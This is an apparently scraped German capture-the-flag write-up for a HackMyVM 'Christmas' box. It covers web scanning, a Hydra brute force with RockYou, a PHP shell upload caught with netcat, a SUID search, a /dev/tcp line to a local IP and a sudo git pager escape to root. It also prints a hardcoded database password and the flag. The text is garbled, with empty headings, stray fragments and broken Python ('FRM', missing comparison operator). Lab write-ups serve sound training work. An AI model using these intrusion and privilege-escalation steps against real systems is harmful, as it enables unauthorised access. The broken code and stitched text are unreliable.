Technische Analyse: vi /etc/hosts öffnet die /etc/hosts-Datei mit dem vi-Texteditor. Diese Datei wird verwendet, um Hostnamen zu IP-Adressen zuzuordnen.
Kontextbezogene Bewertung: Durch Hinzufügen des Hostnamens "xmas.hmv" zur /etc/hosts-Datei kann der Hostname im Browser oder in anderen Tools verwendet werden, um auf den Zielserver zuzugreifen.
Handlungsorientierte Empfehlungen:
Technische Analyse: nikto -h http://christmas.hmv ist ein Open-Source-Webserver-Scanner, der auf bekannte Schwachstellen, Konfigurationsfehler und gefährliche Dateien prüft. Die Option -h gibt das Ziel an.
Kontextbezogene Bewertung: Nikto hat mehrere interessante Punkte gefunden, darunter fehlende Sicherheitsheader (X-Frame-Options, X-Content-Type-Options), Directory Indexing in /css/, /php/ und /images/, sowie die Verwendung von ungültigen HTTP-Methoden. Diese Punkte können von Angreifern ausgenutzt werden.
Handlungsorientierte Empfehlungen:
Technische Analyse: dirb http://christmas.hmv ist ein Tool zum Auffinden von versteckten Verzeichnissen und Dateien auf einem Webserver. Es verwendet eine Wordlist, um mögliche Pfade zu erraten und prüft, ob diese existieren.
Kontextbezogene Bewertung: Dirb hat mehrere interessante Verzeichnisse und Dateien gefunden, darunter /images/, /css/, /fonts/, /javascript/, /js/, /php/ und /uploads/. Diese könnten potenzielle Angriffsziele sein.
Handlungsorientierte Empfehlungen:
Technische Analyse: gobuster dir -u http://christmas.hmv -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,js -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error -k ist ein Tool zum Auffinden von versteckten Verzeichnissen und Dateien auf einem Webserver. Es verwendet eine Wordlist, um mögliche Pfade zu erraten und prüft, ob diese existieren.
Kontextbezogene Bewertung: Gobuster hat ähnliche Verzeichnisse wie Dirb gefunden.
Handlungsorientierte Empfehlungen:
Technische Analyse: Hydra wird auf die User ausgefahren .
Kontextbezogene Bewertung: Hier werden die drei Benutzernamen die in der Webseite genannt worden sind mit der RockYou txt durchprobiert
Handlungsorientierte Empfehlungen:
Technische Analyse:Es wird versucht durch Subdomains weitere Informationen zu bekommen
Kontextbezogene Bewertung:www wird Gefunden
Handlungsorientierte Empfehlungen:
Technische Analyse: Hier werden mit http GET mehr Details rausgefunden
Kontextbezogene Bewertung: Informationen aus dem Browser sind sichtbar.
Handlungsorientierte Empfehlungen:
Technische Analyse: Hier wurde die Shell.php hochgeladen und im Terminal mit NetCat Verbindung Abgefangen
Kontextbezogene Bewertung: Webserver Zugriff aus der Kali erhalten. .
Handlungsorientierte Empfehlungen:
Technische Analyse: Hier Werden mit CMD befehlen nach root Rechten gesucht
Kontextbezogene Bewertung: Mit find / -type f -perm -4000 -ls 2>/dev/null weitere root Rechte gefunden.
Handlungsorientierte Empfehlungen:
user="root",
password="ChristmasMustGon!",
database="christmas"
)
#Read the names of the wish list
def read_names(directory):
for filename in os.listdir(directory):
full_path = os.path.join(directory, filename)
if os.path.isfile(full_path):
name, ext = os.path.splitext(filename)
if any(char.isalnum() for char in name):
status = random.choice(["nice", "naughty"])
#print(f"{name} {status}")
insert_data(name, status)
os.remove(full_path)
else:
pass
elif os.path.isdir(full_path):
pass
# Insert name into the database
def insert_data(name, status):
mycursor = mydb.cursor()
sql = "INSERT INTO christmas (name, status) VALUES ( %s, %s)"
val = (name, status)
mycursor.execute(sql, val)
mydb.commit()
#Generate printable Nice and Naughty list
def generate_lists():
mycursor = mydb.cursor()
# SQL query to fetch all names and status
mycursor.execute("SELECT name, status FRM christmas")
# Separate the nice and naughty lists
nice_list = []
naughty_list = []
for (name, status) in mycursor:
if status "nice":
nice_list.append(name)
else:
naughty_list.append(name)
parent_directory = os.path.dirname(os.getcwd())
file_path = "/home/alabaster/nice_list.txt"
# Save the nice and naughty lists to separate txt files
with open(file_path, "w") as file:
for name in nice_list:
file.write(f"{name}\n")
file_path = "/home/alabaster/naughty_list.txt"
with open(file_path, "w") as file:
for name in naughty_list:
file.write(f"{name}\n")
read_names(directory)
generate_lists()
cat <config
!/bin/sh
EOF
./config
chmod +x config
sudo /usr/bin/git -p help config -c 'pager=./config' -c 'core.pager=!/bin/sh' show
cat /root/flag.txt
< /dev/tcp/192.168.2.122/21
id
exit
:
exit
<
< >config -l
!< >a/new-service :33
id
:
"
hier wird endlich das Root passwort erhaltenTechnische Analyse: Der Exploit wurde erfolgreich ausgeführt
Holen der Flags HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
Technische Analyse:
arp-scan -lsendet ARP-Anfragen an alle IP-Adressen im lokalen Netzwerksegment, um die MAC-Adressen der verbundenen Geräte zu ermitteln.Kontextbezogene Bewertung: Dieses Tool ist nützlich, um aktive Hosts im Netzwerk zu identifizieren, insbesondere wenn keine anderen Discovery-Methoden verfügbar sind.
Handlungsorientierte Empfehlungen: